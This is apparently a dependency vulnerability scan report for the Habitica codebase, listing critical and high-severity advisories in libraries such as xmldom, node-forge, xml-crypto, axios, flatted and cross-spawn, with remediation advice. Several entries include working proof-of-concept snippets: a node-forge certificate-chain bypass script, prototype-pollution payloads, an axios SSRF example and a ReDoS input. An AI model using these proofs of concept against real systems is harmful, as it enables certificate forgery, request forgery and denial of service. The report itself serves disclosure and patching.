Find, fix and prevent vulnerabilities in your code.
critical severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to Improper Input Validation due to parsing XML that is not well-formed, and contains multiple top-level elements. All the root nodes are being added to the childNodes collection of the Document, without reporting or throwing any error.
Workarounds
One of the following approaches might help, depending on your use case:
Instead of searching for elements in the whole DOM, only search in the
documentElement.Reject a document with a document that has more than 1
childNode.
PoC
var DOMParser = require('xmldom').DOMParser;
var xmlData = '<?xml version="1.0" encoding="UTF-8"?>\n' +
'<root>\n' +
' <branch girth="large">\n' +
' <leaf color="green" />\n' +
' </branch>\n' +
'</root>\n' +
'<root>\n' +
' <branch girth="twig">\n' +
' <leaf color="gold" />\n' +
' </branch>\n' +
'</root>\n';
var xmlDOM = new DOMParser().parseFromString(xmlData);
console.log(xmlDOM.toString());
This will result with the following output:
<?xml version="1.0" encoding="UTF-8"?><root>
<branch girth="large">
<leaf color="green"/>
</branch>
</root>
<root>
<branch girth="twig">
<leaf color="gold"/>
</branch>
</root>
Remediation
There is no fixed version for xmldom.
References
critical severity
- Vulnerable module: form-data
- Introduced through: amazon-payments@0.2.9, in-app-purchase@1.11.4 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amazon-payments@0.2.9 › request@2.88.2 › form-data@2.3.3
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › request@2.88.0 › form-data@2.3.3
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp.spritesmith@6.13.1 › spritesmith@3.5.1 › pixelsmith@2.6.0 › get-pixels@3.3.3 › request@2.88.2 › form-data@2.3.3
Overview
Affected versions of this package are vulnerable to Predictable Value Range from Previous Values via the boundary value, which uses Math.random(). An attacker can manipulate HTTP request boundaries by exploiting predictable values, potentially leading to HTTP parameter pollution.
Remediation
Upgrade form-data to version 2.5.4, 3.0.4, 4.0.4 or higher.
References
critical severity
- Vulnerable module: babel-traverse
- Introduced through: babel-preset-env@1.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-block-scoping@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-block-scoping@6.26.0 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-computed-properties@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-systemjs@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-function-name@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-object-super@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-parameters@6.24.1 › babel-helper-call-delegate@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-function-name@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-object-super@6.24.1 › babel-helper-replace-supers@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-define-map@6.26.0 › babel-helper-function-name@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-exponentiation-operator@6.24.1 › babel-helper-builder-binary-assignment-operator-visitor@6.24.1 › babel-helper-explode-assignable-expression@6.24.1 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-async-to-generator@6.24.1 › babel-helper-remap-async-to-generator@6.24.1 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-classes@6.24.1 › babel-helper-define-map@6.26.0 › babel-helper-function-name@6.24.1 › babel-template@6.26.0 › babel-traverse@6.26.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › babel-plugin-transform-es2015-modules-umd@6.24.1 › babel-plugin-transform-es2015-modules-amd@6.24.1 › babel-plugin-transform-es2015-modules-commonjs@6.26.2 › babel-template@6.26.0 › babel-traverse@6.26.0
Overview
Affected versions of this package are vulnerable to Incomplete List of Disallowed Inputs when using plugins that rely on the path.evaluate() or path.evaluateTruthy() internal Babel methods.
Note:
This is only exploitable if the attacker uses known affected plugins such as @babel/plugin-transform-runtime, @babel/preset-env when using its useBuiltIns option, and any "polyfill provider" plugin that depends on @babel/helper-define-polyfill-provider. No other plugins under the @babel/ namespace are impacted, but third-party plugins might be.
Users that only compile trusted code are not impacted.
Workaround
Users who are unable to upgrade the library can upgrade the affected plugins instead, to avoid triggering the vulnerable code path in affected @babel/traverse.
Remediation
There is no fixed version for babel-traverse.
References
critical severity
new
- Vulnerable module: flatted
- Introduced through: eslint-config-habitrpg@6.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-config-habitrpg@6.2.3 › eslint@6.8.0 › file-entry-cache@5.0.1 › flat-cache@2.0.1 › flatted@2.0.2
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the parse function. An attacker can manipulate the prototype chain by supplying a specially crafted string that causes the returned object to reference Array.prototype, allowing subsequent writes to that property to affect the global prototype and potentially lead to denial of service or code execution.
PoC
const Flatted = require('flatted');
const parsed = Flatted.parse('[{"x":"__proto__"}]');
parsed.x.polluted = 'pwned';
console.log([].polluted); // Returns true
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade flatted to version 3.4.2 or higher.
References
critical severity
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@7.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Interpretation Conflict via the asn1.validate() function. An attacker can cause schema validation to become desynchronized, resulting in semantic divergence that may allow bypassing cryptographic verifications and security decisions, by passing in ASN.1 data with optional parameters that may be interpreted as object boundaries.
Remediation
Upgrade node-forge to version 1.3.2 or higher.
References
critical severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is a xml digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the SignedInfo references. An attacker can modify a valid signed XML message to bypass signature verification checks by altering critical identity or access control attributes, enabling privilege escalation or impersonation.
Remediation
Upgrade xml-crypto to version 2.1.6, 3.2.1, 6.0.1 or higher.
References
critical severity
- Vulnerable module: xml-crypto
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1
Overview
xml-crypto is a xml digital signature and encryption library for Node.js.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to the manipulation of the DigestValue element within the XML structure. An attacker can alter the integrity of the XML document and bypass security checks by inserting or modifying comments within the DigestValue element.
Remediation
Upgrade xml-crypto to version 2.1.6, 3.2.1, 6.0.1 or higher.
References
critical severity
new
- Vulnerable module: node-forge
- Introduced through: @parse/node-apn@5.2.3
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @parse/node-apn@5.2.3 › node-forge@1.3.1Remediation: Upgrade to @parse/node-apn@8.0.0.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Certificate Validation in the verifyCertificateChain function. An attacker can gain unauthorized certificate authority capabilities by presenting a certificate chain where an intermediate certificate lacks both basicConstraints and keyUsage extensions, allowing the attacker to sign certificates for arbitrary domains and have them accepted as valid.
PoC
const forge = require('node-forge');
const pki = forge.pki;
function generateKeyPair() {
return pki.rsa.generateKeyPair({ bits: 2048, e: 0x10001 });
}
console.log('=== node-forge basicConstraints Bypass PoC ===\n');
// 1. Create a legitimate Root CA (self-signed, with basicConstraints cA=true)
const rootKeys = generateKeyPair();
const rootCert = pki.createCertificate();
rootCert.publicKey = rootKeys.publicKey;
rootCert.serialNumber = '01';
rootCert.validity.notBefore = new Date();
rootCert.validity.notAfter = new Date();
rootCert.validity.notAfter.setFullYear(rootCert.validity.notBefore.getFullYear() + 10);
const rootAttrs = [
{ name: 'commonName', value: 'Legitimate Root CA' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
rootCert.setSubject(rootAttrs);
rootCert.setIssuer(rootAttrs);
rootCert.setExtensions([
{ name: 'basicConstraints', cA: true, critical: true },
{ name: 'keyUsage', keyCertSign: true, cRLSign: true, critical: true }
]);
rootCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 2. Create a "leaf" certificate signed by root — NO basicConstraints, NO keyUsage
// This certificate should NOT be allowed to sign other certificates
const leafKeys = generateKeyPair();
const leafCert = pki.createCertificate();
leafCert.publicKey = leafKeys.publicKey;
leafCert.serialNumber = '02';
leafCert.validity.notBefore = new Date();
leafCert.validity.notAfter = new Date();
leafCert.validity.notAfter.setFullYear(leafCert.validity.notBefore.getFullYear() + 5);
const leafAttrs = [
{ name: 'commonName', value: 'Non-CA Leaf Certificate' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
leafCert.setSubject(leafAttrs);
leafCert.setIssuer(rootAttrs);
// NO basicConstraints extension — NO keyUsage extension
leafCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 3. Create a "victim" certificate signed by the leaf
// This simulates an attacker using a non-CA cert to forge certificates
const victimKeys = generateKeyPair();
const victimCert = pki.createCertificate();
victimCert.publicKey = victimKeys.publicKey;
victimCert.serialNumber = '03';
victimCert.validity.notBefore = new Date();
victimCert.validity.notAfter = new Date();
victimCert.validity.notAfter.setFullYear(victimCert.validity.notBefore.getFullYear() + 1);
const victimAttrs = [
{ name: 'commonName', value: 'victim.example.com' },
{ name: 'organizationName', value: 'Victim Corp' }
];
victimCert.setSubject(victimAttrs);
victimCert.setIssuer(leafAttrs);
victimCert.sign(leafKeys.privateKey, forge.md.sha256.create());
// 4. Verify the chain: root -> leaf -> victim
const caStore = pki.createCaStore([rootCert]);
try {
const result = pki.verifyCertificateChain(caStore, [victimCert, leafCert]);
console.log('[VULNERABLE] Chain verification SUCCEEDED: ' + result);
console.log(' node-forge accepted a non-CA certificate as an intermediate CA!');
console.log(' This violates RFC 5280 Section 6.1.4.');
} catch (e) {
console.log('[SECURE] Chain verification FAILED (expected): ' + e.message);
}
Remediation
Upgrade node-forge to version 1.4.0 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: node-gcm@1.1.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through unexpected behavior where requests for path-relative URLs get processed as protocol-relative URLs. An attacker can manipulate the server to make unauthorized requests by exploiting this behavior.
PoC
const axios = require('axios');
this.axios = axios.create({
baseURL: 'https://userapi.example.com',
});
//userId = '12345';
userId = '/google.com'
this.axios.get(`/${userId}`).then(function (response) {
console.log(`config.baseURL: ${response.config.baseURL}`);
console.log(`config.method: ${response.config.method}`);
console.log(`config.url: ${response.config.url}`);
console.log(`res.responseUrl: ${response.request.res.responseUrl}`);
});
Output:
config.baseURL: https://userapi.example.com
config.method: get
config.url: //google.com
res.responseUrl: http://www.google.com/
Remediation
Upgrade axios to version 1.7.4 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › node-gcm@1.1.4 › axios@1.6.8
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › winston-loggly-bulk@3.3.3 › node-loggly-bulk@4.0.2 › axios@1.7.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Prototype Pollution via the mergeConfig function. An attacker can cause the application to crash by supplying a malicious configuration object containing a __proto__ property, typically by leveraging JSON.parse().
PoC
import axios from "axios";
const maliciousConfig = JSON.parse('{"__proto__": {"x": 1}}');
await axios.get("https://domain/get", maliciousConfig);
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade axios to version 0.30.3, 1.13.5 or higher.
References
high severity
- Vulnerable module: cross-spawn
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › exec-buffer@3.2.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-build@3.0.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-check@4.1.0 › execa@0.7.0 › cross-spawn@5.1.0
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper input sanitization. An attacker can increase the CPU usage and crash the program by crafting a very large and well crafted string.
PoC
const { argument } = require('cross-spawn/lib/util/escape');
var str = "";
for (var i = 0; i < 1000000; i++) {
str += "\\";
}
str += "◎";
console.log("start")
argument(str)
console.log("end")
// run `npm install cross-spawn` and `node attack.js`
// then the program will stuck forever with high CPU usage
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade cross-spawn to version 6.0.6, 7.0.5 or higher.
References
high severity
new
- Vulnerable module: fast-xml-parser
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
